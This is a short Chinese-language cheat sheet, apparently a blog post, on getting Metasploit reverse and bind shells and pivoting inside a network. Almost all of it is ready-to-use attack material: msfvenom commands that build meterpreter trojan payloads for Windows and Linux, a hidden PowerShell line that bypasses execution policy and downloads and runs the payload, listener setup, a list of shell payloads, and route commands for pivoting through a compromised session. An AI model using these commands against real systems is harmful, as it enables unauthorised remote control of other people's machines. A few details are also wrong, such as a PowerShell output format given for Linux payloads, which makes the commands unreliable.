msf反弹shell内网渗透

用法示例:

1. msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=<本机ip地址> lport=<本机监听端口> -f psh-reflection  -o xx.ps1   //生成文件放在目标机目录下
    //powershell执行脚本:powershell -windowstyle hidden -exec bypass IEX (New-Object  Net.WebClient).DownloadString('http:///xxx.ps1');xxx.ps1
2. use exploit/multi/handler
3. set payload windows/x64/meterpreter/reverse_tcp
4. show options
5. set LHOST=XXX    RHOST=XXX
6. run
7. 目标主机执行木马文件

0x01 msfvenon生成木马文件:

格式:msfvenom -p -a --platform -e -i -b -n -f -o
          // -e 常用编码    x86/shikata_ga_nai      cmd/powershell_base64
         // -f指指定的可执行文件类型   -o 指定输出地址。

反向连接:

linux:

  • msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<本机ip地址> LPORT=<本机监听端口> -f psh-reflection  -o xx.ps1

windows:

  • msfvenom -p windows/meterpreter/reverse_tcp LHOST=<本机ip地址> LPORT=<本机监听端口> -f psh-reflection  -o xx.ps1
  • //生成64位系统木马:
    msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=<本机ip地址> lport=<本机监听端口> -f psh-reflection  -o xx.ps1

正向连接:

linux:

  • msfvenom -p linux/x86/meterpreter/bind_tcp LHOST=<本机ip地址> LPORT=<本机监听端口> -f psh-reflection  -o xx.ps1

windows:

  • msfvenom -p windows/meterpreter/bind_tcp LHOST=<本机ip地址> LPORT=<本机监听端口> -f psh-reflection  -o xx.ps1

0x02 启用exploit/multi/handler模块:

use exploit/multi/handler

0x03 设置PAYLOAD:

linux:

linux/x86/meterpreter/reverse_tcp  //反向payload
linux/x86/meterpreter/bind_tcp       //正向payload
linux/x86/shell_bind_tcp
linux/x86/shell_reverse_tcp
linux/x64/shell_reverse_tcp
linux/x64/shell_bind_tcp

windows:

windows/meterpreter/reverse_tcp    //反向payload
windows/meterpreter/bind_tcp         //正向payload
windows/shell_reverse_tcp
windows/shell_bind_tcp
windows/x64/meterpreter/reverse_tcp
windows/x64/meterpreter/bind_tcp
windows/x64/shell_reverse_tcp
windows/x64/shell_bind_tcp

0x04 设置参数运行

set  .....

run

0x05 添加路由

route add <目标IP> <目标子网掩码>

示例:route add 10.0.0.1 255.0.0.0 1       //最后的1为添加该路由到session 1

你可能感兴趣的:(渗透测试)